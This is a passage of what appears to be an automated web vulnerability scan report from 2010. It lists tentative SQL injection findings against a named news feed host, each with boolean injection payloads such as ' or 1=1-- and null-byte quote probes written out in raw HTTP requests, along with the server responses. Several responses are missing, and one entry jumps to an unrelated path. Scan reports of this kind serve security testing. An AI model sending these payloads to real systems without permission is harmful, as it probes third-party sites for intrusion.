</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.86. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200930.xml [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200930.xml

Issue detail

Request 1

GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200930.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:03 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200930.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:22:03 GMT
Date: Tue, 07 Dec 2010 23:22:03 GMT
Content-Length: 424
Connection: close

<HTML>

<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>

1.87. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200934.xml [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200934.xml

Issue detail

Request 1

GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200934.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:22:15 GMT
Date: Tue, 07 Dec 2010 23:22:15 GMT
Content-Length: 424
Connection: close

<HTML>

<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>

Request 2

GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200934.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.88. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200935.xml [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200935.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 12838428'%20or%201%3d1--%20 and 12838428'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi12838428'%20or%201%3d1--%20/rss/CustomRssServlet/568/200935.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:21:57 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi12838428'%20or%201%3d2--%20/rss/CustomRssServlet/568/200935.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:21:57 GMT
Date: Tue, 07 Dec 2010 23:21:57 GMT
Content-Length: 424
Connection: close

<HTML>

<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>

1.89. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200935.xml [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200935.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 13599438%20or%201%3d1--%20 and 13599438%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/56813599438%20or%201%3d1--%20/200935.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

Request 2

GET /mngi/rss/CustomRssServlet/56813599438%20or%201%3d2--%20/200935.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:10 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.90. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200936.xml [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200936.xml

Issue detail

Request 1

GET /mngi/rss/CustomRssServlet/568'%20and%201%3d1--%20/200936.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

Request 2

GET /mngi/rss/CustomRssServlet/568'%20and%201%3d2--%20/200936.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:35 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.91. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200939.xml [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200939.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 13962808%20or%201%3d1--%20 and 13962808%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/56813962808%20or%201%3d1--%20/200939.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

Request 2

GET /mngi/rss/CustomRssServlet/56813962808%20or%201%3d2--%20/200939.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.92. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200946.xml [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200946.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 11601329'%20or%201%3d1--%20 and 11601329'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet11601329'%20or%201%3d1--%20/568/200946.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

Request 2

GET /mngi/rss/CustomRssServlet11601329'%20or%201%3d2--%20/568/200946.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:31 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.93. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200950.xml [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200950.xml

Issue detail

Remediation detail

Request 1

GET /mngi/rss/CustomRssServlet/568%00'/200950.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Date: Tue, 07 Dec 2010 23:22:49 GMT
Connection: close

<h1>Bad Request (Invalid URL)</h1>

Request 2

GET /mngi/rss/CustomRssServlet/568%00''/200950.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.94. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200952.xml [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200952.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 84008678'%20or%201%3d1--%20 and 84008678'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet84008678'%20or%201%3d1--%20/568/200952.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

Request 2

GET /mngi/rss/CustomRssServlet84008678'%20or%201%3d2--%20/568/200952.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:46 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.95. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200953.xml [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200953.xml

Issue detail

Request 1

GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200953.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:22:48 GMT
Date: Tue, 07 Dec 2010 23:22:48 GMT
Content-Length: 424
Connection: close

<HTML>

<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>

Request 2

GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200953.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:48 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.96. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200956.xml [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200956.xml

Issue detail

Request 1

GET /mngi/rss/CustomRssServlet/568'%20and%201%3d1--%20/200956.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

Request 2

GET /mngi/rss/CustomRssServlet/568'%20and%201%3d2--%20/200956.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.97. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200957.xml [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200957.xml

Issue detail

Remediation detail

Request 1

GET /mngi/rss/CustomRssServlet%00'/568/200957.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Date: Tue, 07 Dec 2010 23:22:44 GMT
Connection: close

<h1>Bad Request (Invalid URL)</h1>

Request 2

GET /mngi/rss/CustomRssServlet%00''/568/200957.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.98. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200957.xml [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200957.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 15133132%20or%201%3d1--%20 and 15133132%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/56815133132%20or%201%3d1--%20/200957.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

Request 2

GET /mngi/rss/CustomRssServlet/56815133132%20or%201%3d2--%20/200957.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.99. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200960.xml [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200960.xml

Response 1

Request 2

GET /mngi/rss/CustomRssServlet15372256'%20or%201%3d2--%20/568/210701.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.103. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/214511.xml [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/214511.xml

Issue detail

Request 1

GET /mngi/rss/CustomRssServlet/568'%20and%201%3d1--%20/214511.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:50 GMT
Connection: close

